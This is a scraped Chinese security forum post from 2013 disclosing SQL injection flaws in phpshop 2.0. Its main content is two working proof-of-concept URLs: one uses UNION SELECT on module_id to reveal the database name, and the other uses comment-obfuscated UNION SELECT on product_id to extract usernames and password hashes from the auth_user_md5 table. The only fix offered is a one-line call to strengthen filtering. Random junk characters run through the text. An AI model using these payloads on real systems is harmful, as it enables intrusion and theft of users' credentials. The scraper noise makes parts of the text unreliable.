找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1944|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability* {. `* G/ f6 ?+ D- u; q. f

; }1 }8 D% A, l) m5 v! Z) C$ v作者 : By onestree4 i% q6 Y' D$ \, v
下载地址 : http://code.google.com/p/phpshop/downloads/list
# C2 D& o% m. [9 ~6 Y# |测试地址: windows 7 / ubuntu/ s1 v0 Y* s' ?. O& ~; r: q' S) C$ {

2 t; c: S9 K, O ( c. o% n6 [- t, B# Z/ d
SQLi p0c:
4 z; k8 x4 C4 [' ~+ y9 s
" m. o/ J. z# P' x' }% D==================6 ?0 J! S; u! y! z' h# p2 m; u6 c) T

% H6 q' T8 R0 e" g+ S' m9 j. |http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'7 N8 l7 O. V6 X; m# @. L" ]
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --& B* M0 I6 G$ B# B4 l( r

' |3 T8 A' ?6 T- ]+ A: n; W" whttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& c, u/ H8 f  A3 d4 z. R, |% ]: z7 m0 w6 H9 U
修复:
3 {/ K, \( r6 _" g0 y+ Y/ \7 a' b加强过滤
( B4 m9 E/ [0 u% Y1 |2 F  j0 m! z2 t6 X# J) n0 v8 {( q

: ~, Z! M6 Y# I" x% F1 a+ l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表